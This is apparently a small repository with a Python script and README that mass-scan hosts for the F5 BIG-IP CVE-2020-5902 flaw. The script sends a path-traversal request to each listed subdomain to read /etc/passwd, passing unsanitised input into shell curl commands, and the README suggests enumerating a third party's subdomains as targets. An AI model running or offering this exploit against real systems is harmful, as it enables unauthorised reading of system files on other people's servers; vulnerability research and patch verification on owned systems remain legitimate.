├── CVE-2020-5902.py └── README.md /CVE-2020-5902.py: -------------------------------------------------------------------------------- 1 | 2 | import subprocess 3 | 4 | author = """ 5 | Auhtor : Pushpender Singh 6 | Written In: Python 3 7 | GitHub : github.com/PushpenderIndia 8 | 9 | """ 10 | 11 | print(author) 12 | print("[**********************************************************************]") 13 | print("[*] Automated Scanner For F5 BIG IP CVE-2020-5902 Remote Code Execution") 14 | print("[**********************************************************************]") 15 | 16 | subdomains = input("[?] Enter Subdomain Path: ") 17 | subdomains_list = [] 18 | 19 | with open(subdomains, 'r') as f: 20 | for subdomain in f.readlines(): 21 | if subdomain != "\n": 22 | subdomains_list.append(subdomain.strip()) 23 | 24 | print(f"[>>] Total Subdomains Loaded: {len(subdomains_list)}") 25 | 26 | for subdomain in subdomains_list: 27 | try: 28 | exploit_using_curl = subprocess.check_output(f"curl -sk https://{subdomain}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd", shell=True) 29 | if exploit_using_curl == b'': 30 | exploit_using_curl = subprocess.check_output(f"curl -sk http://{subdomain}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd", shell=True) 31 | except Exception: 32 | exploit_using_curl = b'test_manual' 33 | 34 | if b'root:x:0:0:root' in exploit_using_curl: 35 | print(f"\033[0;31m[+] {subdomain} Vulnerable") 36 | 37 | elif b'test_manual' in exploit_using_curl: 38 | print(f"\33[97m[-] [Exception Occured, Try Manually] : {subdomain}") 39 | 40 | else: 41 | print(f"\033[0;32m[-] {subdomain} Not Vulnerable") 42 | 43 | 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2020-5902-Scanner 2 | Automated F5 Big IP Remote Code Execution (CVE-2020-5902) Scanner Written In Python 3 3 | 4 | ## Vulnerability Description 5 | F5 released a Critical Remote Code Execution vulnerability (CVE-2020-5902) on 30th June 2020 that affects several versions of Big IP. 6 | Attacker can easily exploit RCE & LFI present in TMUI (Traffic Management User Interface) in undisclosed pages. 7 | 8 | In short, it is a varient of Remote Code Execution & Local File Inclusion Vulnerability which has a CVSS Score 10. 9 | 10 | ## Installation 11 | ``` 12 | # For Windows 13 | $python -m pip install requests 14 | 15 | # OR 16 | 17 | # For Linux 18 | $ sudo apt-get install python3-pip 19 | $ sudo pip3 install requests 20 | ``` 21 | 22 | ## Usage 23 | 24 | Ideal Target For This Script: `google.com` 25 | 26 | Don't Give These Type of target: `https://google.com` or `http://google.com` 27 | 28 | ``` 29 | # For Windows 30 | $ python CVE-2020-5902.py 31 | 32 | # For Linux 33 | $ python3 CVE-2020-5902.py 34 | ``` 35 | 36 | ## Use cases 37 | ``` 38 | # Enumeration Subdomain Using Sublist3r 39 | $ python sublist3r.py -d google.com -o google.com.txt 40 | 41 | # Giving This Subdomain List to CVE-2020-5902.py 42 | $ python CVE-2020-5902.py 43 | ```` 44 | 45 | 46 | --------------------------------------------------------------------------------